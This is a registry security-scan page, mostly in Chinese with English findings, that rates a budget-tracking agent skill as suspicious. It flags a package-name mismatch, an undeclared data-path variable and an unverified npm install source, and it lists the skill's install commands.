by 安全扫描
OpenClaw
可疑
medium confidenceNULL
评估建议
Before installing or letting an agent use this skill: 1) Verify the npm package name and author — search for 'agent-money-tracker' on the npm registry and check the package README, repository, and publish history. 2) Confirm the package's source (GitHub or other repo) and review its code for anything unexpected (network calls, credential access, postinstall scripts). 3) Treat the CLAWHUB_DATA_PATH env var as sensitive — set it to an isolated directory or sandbox and do not point it at system fol...详细分析 ▾
ℹ 用途与能力
Name/description and the SKILL.md content describe a budget-tracking library (expenses, budgets, goals, analytics) and those features are coherent with the stated purpose. However, the registry metadata (slug: intelligent-budget-tracker) does not match the npm package name referenced in the instructions ('agent-money-tracker' / import 'agent-money-tracker' / variable 'clawhub'), which is an inconsistency that could be an editorial mistake or a sign of mismatch/typosquatting.
⚠ 指令范围
SKILL.md instructs consumers to npm install and import a third-party TypeScript library and shows APIs that read/write local data paths and perform exports/backups. It also references an environment variable (CLAWHUB_DATA_PATH) and platform-specific storage locations; that env var is not declared in the registry metadata. The instructions do not ask to exfiltrate data to external endpoints, but they do instruct file-system access and installing and running external code — both expected for such a library but sensitive and not fully documented here (no provenance or required credentials).
⚠ 安装机制
The registry contains no install spec, yet SKILL.md tells you to 'npm install agent-money-tracker'. Because the package source/homepage are unknown and the registry metadata lacks provenance, having the agent install a third-party npm package is a moderate risk: npm packages execute code when installed/required and can contain malicious logic. The instruction to install from the public npm ecosystem is expected for a library, but the absence of a declared, verifiable source (homepage or repo) raises concern.
ℹ 凭证需求
No environment variables or credentials are declared in the registry metadata, which is appropriate for a local-only budget tracker. However SKILL.md references CLAWHUB_DATA_PATH (to override data location) without that being declared. While the library does not request secrets or cloud credentials (proportional to purpose), the undocumented environment variable is a discrepancy that should be clarified.
✓ 持久化与权限
No elevated persistence is requested: always is false, the skill is user-invocable, and there is no indication it modifies other skills or global agent configs. File-system writes are expected for local data storage but are limited to the library's own data paths per the documentation.
安全有层次,运行前请审查代码。
运行时依赖
无特殊依赖
版本
latestv1.0.12026/2/1
NULL
● 无害
安装命令
点击复制官方npx clawhub@latest install intelligent-budget-tracker
镜像加速npx clawhub@latest install intelligent-budget-tracker --registry https://cn.longxiaskill.com